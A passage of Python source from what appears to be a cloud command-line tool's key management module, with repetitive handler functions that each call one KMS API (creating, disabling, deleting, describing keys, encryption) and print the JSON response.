        json_obj = json.loads(result.decode('utf-8'))
    FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDisableKeys(args, parsed_globals):
    """Call the KMS DisableKeys API with *args* and print the formatted response.

    args: dict of request parameters, serialized into a DisableKeysRequest.
    parsed_globals: parsed global CLI options (credentials, region, endpoint, ...).
    """
    g_param = parse_global_arg(parsed_globals)
    cred = credential.Credential(
        g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
    )
    http_profile = HttpProfile(
        # 60s default request timeout unless overridden via the CLI.
        reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
        reqMethod="POST",
        endpoint=g_param[OptionsDefine.Endpoint],
        proxy=g_param[OptionsDefine.HttpsProxy]
    )
    profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
    mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
    client = mod.KmsClient(cred, g_param[OptionsDefine.Region], profile)
    client._sdkVersion += ("_CLI_" + __version__)
    models = MODELS_MAP[g_param[OptionsDefine.Version]]
    model = models.DisableKeysRequest()
    model.from_json_string(json.dumps(args))
    rsp = client.DisableKeys(model)
    result = rsp.to_json_string()
    try:
        json_obj = json.loads(result)
    except TypeError:
        # json.loads rejects bytes on python 3.3; decode first.
        json_obj = json.loads(result.decode('utf-8'))
    FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doArchiveKey(args, parsed_globals):
    """Call the KMS ArchiveKey API with *args* and print the formatted response.

    args: dict of request parameters, serialized into an ArchiveKeyRequest.
    parsed_globals: parsed global CLI options (credentials, region, endpoint, ...).
    """
    g_param = parse_global_arg(parsed_globals)
    cred = credential.Credential(
        g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
    )
    http_profile = HttpProfile(
        # 60s default request timeout unless overridden via the CLI.
        reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
        reqMethod="POST",
        endpoint=g_param[OptionsDefine.Endpoint],
        proxy=g_param[OptionsDefine.HttpsProxy]
    )
    profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
    mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
    client = mod.KmsClient(cred, g_param[OptionsDefine.Region], profile)
    client._sdkVersion += ("_CLI_" + __version__)
    models = MODELS_MAP[g_param[OptionsDefine.Version]]
    model = models.ArchiveKeyRequest()
    model.from_json_string(json.dumps(args))
    rsp = client.ArchiveKey(model)
    result = rsp.to_json_string()
    try:
        json_obj = json.loads(result)
    except TypeError:
        # json.loads rejects bytes on python 3.3; decode first.
        json_obj = json.loads(result.decode('utf-8'))
    FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doGetServiceStatus(args, parsed_globals):
    """Call the KMS GetServiceStatus API with *args* and print the formatted response.

    args: dict of request parameters, serialized into a GetServiceStatusRequest.
    parsed_globals: parsed global CLI options (credentials, region, endpoint, ...).
    """
    g_param = parse_global_arg(parsed_globals)
    cred = credential.Credential(
        g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
    )
    http_profile = HttpProfile(
        # 60s default request timeout unless overridden via the CLI.
        reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
        reqMethod="POST",
        endpoint=g_param[OptionsDefine.Endpoint],
        proxy=g_param[OptionsDefine.HttpsProxy]
    )
    profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
    mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
    client = mod.KmsClient(cred, g_param[OptionsDefine.Region], profile)
    client._sdkVersion += ("_CLI_" + __version__)
    models = MODELS_MAP[g_param[OptionsDefine.Version]]
    model = models.GetServiceStatusRequest()
    model.from_json_string(json.dumps(args))
    rsp = client.GetServiceStatus(model)
    result = rsp.to_json_string()
    try:
        json_obj = json.loads(result)
    except TypeError:
        # json.loads rejects bytes on python 3.3; decode first.
        json_obj = json.loads(result.decode('utf-8'))
    FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doEncryptByWhiteBox(args, parsed_globals):
    """Call the KMS EncryptByWhiteBox API with *args* and print the formatted response.

    args: dict of request parameters, serialized into an EncryptByWhiteBoxRequest.
    parsed_globals: parsed global CLI options (credentials, region, endpoint, ...).
    """
    g_param = parse_global_arg(parsed_globals)
    cred = credential.Credential(
        g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
    )
    http_profile = HttpProfile(
        # 60s default request timeout unless overridden via the CLI.
        reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
        reqMethod="POST",
        endpoint=g_param[OptionsDefine.Endpoint],
        proxy=g_param[OptionsDefine.HttpsProxy]
    )
    profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
    mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
    client = mod.KmsClient(cred, g_param[OptionsDefine.Region], profile)
    client._sdkVersion += ("_CLI_" + __version__)
    models = MODELS_MAP[g_param[OptionsDefine.Version]]
    model = models.EncryptByWhiteBoxRequest()
    model.from_json_string(json.dumps(args))
    rsp = client.EncryptByWhiteBox(model)
    result = rsp.to_json_string()
    try:
        json_obj = json.loads(result)
    except TypeError:
        # json.loads rejects bytes on python 3.3; decode first.
        json_obj = json.loads(result.decode('utf-8'))
    FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doListAlgorithms(args, parsed_globals):
    """Call the KMS ListAlgorithms API with *args* and print the formatted response.

    args: dict of request parameters, serialized into a ListAlgorithmsRequest.
    parsed_globals: parsed global CLI options (credentials, region, endpoint, ...).
    """
    g_param = parse_global_arg(parsed_globals)
    cred = credential.Credential(
        g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
    )
    http_profile = HttpProfile(
        # 60s default request timeout unless overridden via the CLI.
        reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
        reqMethod="POST",
        endpoint=g_param[OptionsDefine.Endpoint],
        proxy=g_param[OptionsDefine.HttpsProxy]
    )
    profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
    mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
    client = mod.KmsClient(cred, g_param[OptionsDefine.Region], profile)
    client._sdkVersion += ("_CLI_" + __version__)
    models = MODELS_MAP[g_param[OptionsDefine.Version]]
    model = models.ListAlgorithmsRequest()
    model.from_json_string(json.dumps(args))
    rsp = client.ListAlgorithms(model)
    result = rsp.to_json_string()
    try:
        json_obj = json.loads(result)
    except TypeError:
        # json.loads rejects bytes on python 3.3; decode first.
        json_obj = json.loads(result.decode('utf-8'))
    FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doReEncrypt(args, parsed_globals):
    """Call the KMS ReEncrypt API with *args* and print the formatted response.

    args: dict of request parameters, serialized into a ReEncryptRequest.
    parsed_globals: parsed global CLI options (credentials, region, endpoint, ...).
    """
    g_param = parse_global_arg(parsed_globals)
    cred = credential.Credential(
        g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
    )
    http_profile = HttpProfile(
        # 60s default request timeout unless overridden via the CLI.
        reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
        reqMethod="POST",
        endpoint=g_param[OptionsDefine.Endpoint],
        proxy=g_param[OptionsDefine.HttpsProxy]
    )
    profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
    mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
    client = mod.KmsClient(cred, g_param[OptionsDefine.Region], profile)
    client._sdkVersion += ("_CLI_" + __version__)
    models = MODELS_MAP[g_param[OptionsDefine.Version]]
    model = models.ReEncryptRequest()
    model.from_json_string(json.dumps(args))
    rsp = client.ReEncrypt(model)
    result = rsp.to_json_string()
    try:
        json_obj = json.loads(result)
    except TypeError:
        # json.loads rejects bytes on python 3.3; decode first.
        json_obj = json.loads(result.decode('utf-8'))
    FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doListKeys(args, parsed_globals):
    """Call the KMS ListKeys API with *args* and print the formatted response.

    args: dict of request parameters, serialized into a ListKeysRequest.
    parsed_globals: parsed global CLI options (credentials, region, endpoint, ...).
    """
    g_param = parse_global_arg(parsed_globals)
    cred = credential.Credential(
        g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
    )
    http_profile = HttpProfile(
        # 60s default request timeout unless overridden via the CLI.
        reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
        reqMethod="POST",
        endpoint=g_param[OptionsDefine.Endpoint],
        proxy=g_param[OptionsDefine.HttpsProxy]
    )
    profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
    mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
    client = mod.KmsClient(cred, g_param[OptionsDefine.Region], profile)
    client._sdkVersion += ("_CLI_" + __version__)
    models = MODELS_MAP[g_param[OptionsDefine.Version]]
    model = models.ListKeysRequest()
    model.from_json_string(json.dumps(args))
    rsp = client.ListKeys(model)
    result = rsp.to_json_string()
    try:
        json_obj = json.loads(result)
    except TypeError:
        # json.loads rejects bytes on python 3.3; decode first.
        json_obj = json.loads(result.decode('utf-8'))
    FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doGenerateRandom(args, parsed_globals):
    """Call the KMS GenerateRandom API with *args* and print the formatted response.

    args: dict of request parameters, serialized into a GenerateRandomRequest.
    parsed_globals: parsed global CLI options (credentials, region, endpoint, ...).
    """
    g_param = parse_global_arg(parsed_globals)
    cred = credential.Credential(
        g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
    )
    http_profile = HttpProfile(
        # 60s default request timeout unless overridden via the CLI.
        reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
        reqMethod="POST",
        endpoint=g_param[OptionsDefine.Endpoint],
        proxy=g_param[OptionsDefine.HttpsProxy]
    )
    profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
    mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
    client = mod.KmsClient(cred, g_param[OptionsDefine.Region], profile)
    client._sdkVersion += ("_CLI_" + __version__)
    models = MODELS_MAP[g_param[OptionsDefine.Version]]
    model = models.GenerateRandomRequest()
    model.from_json_string(json.dumps(args))
    rsp = client.GenerateRandom(model)
    result = rsp.to_json_string()
    try:
        json_obj = json.loads(result)
    except TypeError:
        # json.loads rejects bytes on python 3.3; decode first.
        json_obj = json.loads(result.decode('utf-8'))
    FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doOverwriteWhiteBoxDeviceFingerprints(args, parsed_globals):
    """Call the KMS OverwriteWhiteBoxDeviceFingerprints API with *args* and print the formatted response.

    args: dict of request parameters, serialized into an OverwriteWhiteBoxDeviceFingerprintsRequest.
    parsed_globals: parsed global CLI options (credentials, region, endpoint, ...).
    """
    g_param = parse_global_arg(parsed_globals)
    cred = credential.Credential(
        g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
    )
    http_profile = HttpProfile(
        # 60s default request timeout unless overridden via the CLI.
        reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
        reqMethod="POST",
        endpoint=g_param[OptionsDefine.Endpoint],
        proxy=g_param[OptionsDefine.HttpsProxy]
    )
    profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
    mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
    client = mod.KmsClient(cred, g_param[OptionsDefine.Region], profile)
    client._sdkVersion += ("_CLI_" + __version__)
    models = MODELS_MAP[g_param[OptionsDefine.Version]]
    model = models.OverwriteWhiteBoxDeviceFingerprintsRequest()
    model.from_json_string(json.dumps(args))
    rsp = client.OverwriteWhiteBoxDeviceFingerprints(model)
    result = rsp.to_json_string()
    try:
        json_obj = json.loads(result)
    except TypeError:
        # json.loads rejects bytes on python 3.3; decode first.
        json_obj = json.loads(result.decode('utf-8'))
    FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doCreateKey(args, parsed_globals):
    """Call the KMS CreateKey API with *args* and print the formatted response.

    args: dict of request parameters, serialized into a CreateKeyRequest.
    parsed_globals: parsed global CLI options (credentials, region, endpoint, ...).
    """
    g_param = parse_global_arg(parsed_globals)
    cred = credential.Credential(
        g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
    )
    http_profile = HttpProfile(
        # 60s default request timeout unless overridden via the CLI.
        reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
        reqMethod="POST",
        endpoint=g_param[OptionsDefine.Endpoint],
        proxy=g_param[OptionsDefine.HttpsProxy]
    )
    profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
    mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
    client = mod.KmsClient(cred, g_param[OptionsDefine.Region], profile)
    client._sdkVersion += ("_CLI_" + __version__)
    models = MODELS_MAP[g_param[OptionsDefine.Version]]
    model = models.CreateKeyRequest()
    model.from_json_string(json.dumps(args))
    rsp = client.CreateKey(model)
    result = rsp.to_json_string()
    try:
        json_obj = json.loads(result)
    except TypeError:
        # json.loads rejects bytes on python 3.3; decode first.
        json_obj = json.loads(result.decode('utf-8'))
    FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeWhiteBoxKey(args, parsed_globals):
    """Call the KMS DescribeWhiteBoxKey API with *args* and print the formatted response.

    args: dict of request parameters, serialized into a DescribeWhiteBoxKeyRequest.
    parsed_globals: parsed global CLI options (credentials, region, endpoint, ...).
    """
    g_param = parse_global_arg(parsed_globals)
    cred = credential.Credential(
        g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
    )
    http_profile = HttpProfile(
        # 60s default request timeout unless overridden via the CLI.
        reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
        reqMethod="POST",
        endpoint=g_param[OptionsDefine.Endpoint],
        proxy=g_param[OptionsDefine.HttpsProxy]
    )
    profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
    mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
    client = mod.KmsClient(cred, g_param[OptionsDefine.Region], profile)
    client._sdkVersion += ("_CLI_" + __version__)
    models = MODELS_MAP[g_param[OptionsDefine.Version]]
    model = models.DescribeWhiteBoxKeyRequest()
    model.from_json_string(json.dumps(args))
    rsp = client.DescribeWhiteBoxKey(model)
    result = rsp.to_json_string()
    try:
        json_obj = json.loads(result)
    except TypeError:
        # json.loads rejects bytes on python 3.3; decode first.
        json_obj = json.loads(result.decode('utf-8'))
    FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doGetParametersForImport(args, parsed_globals):
    """Call the KMS GetParametersForImport API with *args* and print the formatted response.

    args: dict of request parameters, serialized into a GetParametersForImportRequest.
    parsed_globals: parsed global CLI options (credentials, region, endpoint, ...).
    """
    g_param = parse_global_arg(parsed_globals)
    cred = credential.Credential(
        g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
    )
    http_profile = HttpProfile(
        # 60s default request timeout unless overridden via the CLI.
        reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
        reqMethod="POST",
        endpoint=g_param[OptionsDefine.Endpoint],
        proxy=g_param[OptionsDefine.HttpsProxy]
    )
    profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
    mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
    client = mod.KmsClient(cred, g_param[OptionsDefine.Region], profile)
    client._sdkVersion += ("_CLI_" + __version__)
    models = MODELS_MAP[g_param[OptionsDefine.Version]]
    model = models.GetParametersForImportRequest()
    model.from_json_string(json.dumps(args))
    rsp = client.GetParametersForImport(model)
    result = rsp.to_json_string()
    try:
        json_obj = json.loads(result)
    except TypeError:
        # json.loads rejects bytes on python 3.3; decode first.
        json_obj = json.loads(result.decode('utf-8'))
    FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDisableWhiteBoxKeys(args, parsed_globals):
    """Call the KMS DisableWhiteBoxKeys API with *args* and print the formatted response.

    args: dict of request parameters, serialized into a DisableWhiteBoxKeysRequest.
    parsed_globals: parsed global CLI options (credentials, region, endpoint, ...).
    """
    g_param = parse_global_arg(parsed_globals)
    cred = credential.Credential(
        g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
    )
    http_profile = HttpProfile(
        # 60s default request timeout unless overridden via the CLI.
        reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
        reqMethod="POST",
        endpoint=g_param[OptionsDefine.Endpoint],
        proxy=g_param[OptionsDefine.HttpsProxy]
    )
    profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
    mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
    client = mod.KmsClient(cred, g_param[OptionsDefine.Region], profile)
    client._sdkVersion += ("_CLI_" + __version__)
    models = MODELS_MAP[g_param[OptionsDefine.Version]]
    model = models.DisableWhiteBoxKeysRequest()
    model.from_json_string(json.dumps(args))
    rsp = client.DisableWhiteBoxKeys(model)
    result = rsp.to_json_string()
    try:
        json_obj = json.loads(result)
    except TypeError:
        # json.loads rejects bytes on python 3.3; decode first.
        json_obj = json.loads(result.decode('utf-8'))
    FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doListKeyDetail(args, parsed_globals):
    """Call the KMS ListKeyDetail API with *args* and print the formatted response.

    args: dict of request parameters, serialized into a ListKeyDetailRequest.
    parsed_globals: parsed global CLI options (credentials, region, endpoint, ...).
    """
    g_param = parse_global_arg(parsed_globals)
    cred = credential.Credential(
        g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
    )
    http_profile = HttpProfile(
        # 60s default request timeout unless overridden via the CLI.
        reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
        reqMethod="POST",
        endpoint=g_param[OptionsDefine.Endpoint],
        proxy=g_param[OptionsDefine.HttpsProxy]
    )
    profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
    mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
    client = mod.KmsClient(cred, g_param[OptionsDefine.Region], profile)
    client._sdkVersion += ("_CLI_" + __version__)
    models = MODELS_MAP[g_param[OptionsDefine.Version]]
    model = models.ListKeyDetailRequest()
    model.from_json_string(json.dumps(args))
    rsp = client.ListKeyDetail(model)
    result = rsp.to_json_string()
    try:
        json_obj = json.loads(result)
    except TypeError:
        # json.loads rejects bytes on python 3.3; decode first.
        json_obj = json.loads(result.decode('utf-8'))
    FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doAsymmetricRsaDecrypt(args, parsed_globals):
    """Call the KMS AsymmetricRsaDecrypt API with *args* and print the formatted response.

    args: dict of request parameters, serialized into an AsymmetricRsaDecryptRequest.
    parsed_globals: parsed global CLI options (credentials, region, endpoint, ...).
    """
    g_param = parse_global_arg(parsed_globals)
    cred = credential.Credential(
        g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
    )
    http_profile = HttpProfile(
        # 60s default request timeout unless overridden via the CLI.
        reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
        reqMethod="POST",
        endpoint=g_param[OptionsDefine.Endpoint],
        proxy=g_param[OptionsDefine.HttpsProxy]
    )
    profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
    mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
    client = mod.KmsClient(cred, g_param[OptionsDefine.Region], profile)
    client._sdkVersion += ("_CLI_" + __version__)
    models = MODELS_MAP[g_param[OptionsDefine.Version]]
    model = models.AsymmetricRsaDecryptRequest()
    model.from_json_string(json.dumps(args))
    rsp = client.AsymmetricRsaDecrypt(model)
    result = rsp.to_json_string()
    try:
        json_obj = json.loads(result)
    except TypeError:
        # json.loads rejects bytes on python 3.3; decode first.
        json_obj = json.loads(result.decode('utf-8'))
    FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDisableKeyRotation(args, parsed_globals):
    """Call the KMS DisableKeyRotation API with *args* and print the formatted response.

    args: dict of request parameters, serialized into a DisableKeyRotationRequest.
    parsed_globals: parsed global CLI options (credentials, region, endpoint, ...).
    """
    g_param = parse_global_arg(parsed_globals)
    cred = credential.Credential(
        g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
    )
    http_profile = HttpProfile(
        # 60s default request timeout unless overridden via the CLI.
        reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
        reqMethod="POST",
        endpoint=g_param[OptionsDefine.Endpoint],
        proxy=g_param[OptionsDefine.HttpsProxy]
    )
    profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
    mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
    client = mod.KmsClient(cred, g_param[OptionsDefine.Region], profile)
    client._sdkVersion += ("_CLI_" + __version__)
    models = MODELS_MAP[g_param[OptionsDefine.Version]]
    model = models.DisableKeyRotationRequest()
    model.from_json_string(json.dumps(args))
    rsp = client.DisableKeyRotation(model)
    result = rsp.to_json_string()
    try:
        json_obj = json.loads(result)
    except TypeError:
        # json.loads rejects bytes on python 3.3; decode first.
        json_obj = json.loads(result.decode('utf-8'))
    FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDisableWhiteBoxKey(args, parsed_globals):
    """Call the KMS DisableWhiteBoxKey API with *args* and print the formatted response.

    args: dict of request parameters, serialized into a DisableWhiteBoxKeyRequest.
    parsed_globals: parsed global CLI options (credentials, region, endpoint, ...).
    """
    g_param = parse_global_arg(parsed_globals)
    cred = credential.Credential(
        g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
    )
    http_profile = HttpProfile(
        # 60s default request timeout unless overridden via the CLI.
        reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
        reqMethod="POST",
        endpoint=g_param[OptionsDefine.Endpoint],
        proxy=g_param[OptionsDefine.HttpsProxy]
    )
    profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
    mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
    client = mod.KmsClient(cred, g_param[OptionsDefine.Region], profile)
    client._sdkVersion += ("_CLI_" + __version__)
    models = MODELS_MAP[g_param[OptionsDefine.Version]]
    model = models.DisableWhiteBoxKeyRequest()
    model.from_json_string(json.dumps(args))
    rsp = client.DisableWhiteBoxKey(model)
    result = rsp.to_json_string()
    try:
        json_obj = json.loads(result)
    except TypeError:
        # json.loads rejects bytes on python 3.3; decode first.
        json_obj = json.loads(result.decode('utf-8'))
    FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doEnableKeys(args, parsed_globals):
    """Call the KMS EnableKeys API with *args* and print the formatted response.

    args: dict of request parameters, serialized into an EnableKeysRequest.
    parsed_globals: parsed global CLI options (credentials, region, endpoint, ...).
    """
    g_param = parse_global_arg(parsed_globals)
    cred = credential.Credential(
        g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
    )
    http_profile = HttpProfile(
        # 60s default request timeout unless overridden via the CLI.
        reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
        reqMethod="POST",
        endpoint=g_param[OptionsDefine.Endpoint],
        proxy=g_param[OptionsDefine.HttpsProxy]
    )
    profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
    mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
    client = mod.KmsClient(cred, g_param[OptionsDefine.Region], profile)
    client._sdkVersion += ("_CLI_" + __version__)
    models = MODELS_MAP[g_param[OptionsDefine.Version]]
    model = models.EnableKeysRequest()
    model.from_json_string(json.dumps(args))
    rsp = client.EnableKeys(model)
    result = rsp.to_json_string()
    try:
        json_obj = json.loads(result)
    except TypeError:
        # json.loads rejects bytes on python 3.3; decode first.
        json_obj = json.loads(result.decode('utf-8'))
    FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doScheduleKeyDeletion(args, parsed_globals):
    """Call the KMS ScheduleKeyDeletion API with *args* and print the formatted response.

    args: dict of request parameters, serialized into a ScheduleKeyDeletionRequest.
    parsed_globals: parsed global CLI options (credentials, region, endpoint, ...).
    """
    g_param = parse_global_arg(parsed_globals)
    cred = credential.Credential(
        g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
    )
    http_profile = HttpProfile(
        # 60s default request timeout unless overridden via the CLI.
        reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
        reqMethod="POST",
        endpoint=g_param[OptionsDefine.Endpoint],
        proxy=g_param[OptionsDefine.HttpsProxy]
    )
    profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
    mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
    client = mod.KmsClient(cred, g_param[OptionsDefine.Region], profile)
    client._sdkVersion += ("_CLI_" + __version__)
    models = MODELS_MAP[g_param[OptionsDefine.Version]]
    model = models.ScheduleKeyDeletionRequest()
    model.from_json_string(json.dumps(args))
    rsp = client.ScheduleKeyDeletion(model)
    result = rsp.to_json_string()
    try:
        json_obj = json.loads(result)
    except TypeError:
        # json.loads rejects bytes on python 3.3; decode first.
        json_obj = json.loads(result.decode('utf-8'))
    FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeWhiteBoxDeviceFingerprints(args, parsed_globals):
    """Call the KMS DescribeWhiteBoxDeviceFingerprints API with *args* and print the formatted response.

    args: dict of request parameters, serialized into a DescribeWhiteBoxDeviceFingerprintsRequest.
    parsed_globals: parsed global CLI options (credentials, region, endpoint, ...).
    """
    g_param = parse_global_arg(parsed_globals)
    cred = credential.Credential(
        g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
    )
    http_profile = HttpProfile(
        # 60s default request timeout unless overridden via the CLI.
        reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
        reqMethod="POST",
        endpoint=g_param[OptionsDefine.Endpoint],
        proxy=g_param[OptionsDefine.HttpsProxy]
    )
    profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
    mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
    client = mod.KmsClient(cred, g_param[OptionsDefine.Region], profile)
    client._sdkVersion += ("_CLI_" + __version__)
    models = MODELS_MAP[g_param[OptionsDefine.Version]]
    model = models.DescribeWhiteBoxDeviceFingerprintsRequest()
    model.from_json_string(json.dumps(args))
    rsp = client.DescribeWhiteBoxDeviceFingerprints(model)
    result = rsp.to_json_string()
    try:
        json_obj = json.loads(result)
    except TypeError:
        # json.loads rejects bytes on python 3.3; decode first.
        json_obj = json.loads(result.decode('utf-8'))
    FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeKey(args, parsed_globals):
    """Call the KMS DescribeKey API with *args* and print the formatted response.

    args: dict of request parameters, serialized into a DescribeKeyRequest.
    parsed_globals: parsed global CLI options (credentials, region, endpoint, ...).
    """
    g_param = parse_global_arg(parsed_globals)
    cred = credential.Credential(
        g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
    )
    http_profile = HttpProfile(
        # 60s default request timeout unless overridden via the CLI.
        reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
        reqMethod="POST",
        endpoint=g_param[OptionsDefine.Endpoint],
        proxy=g_param[OptionsDefine.HttpsProxy]
    )
    profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
    mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
    client = mod.KmsClient(cred, g_param[OptionsDefine.Region], profile)
    client._sdkVersion += ("_CLI_" + __version__)
    models = MODELS_MAP[g_param[OptionsDefine.Version]]
    model = models.DescribeKeyRequest()
    model.from_json_string(json.dumps(args))
    rsp = client.DescribeKey(model)
    result = rsp.to_json_string()
    try:
        json_obj = json.loads(result)
    except TypeError:
        # json.loads rejects bytes on python 3.3; decode first.
        json_obj = json.loads(result.decode('utf-8'))
    FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
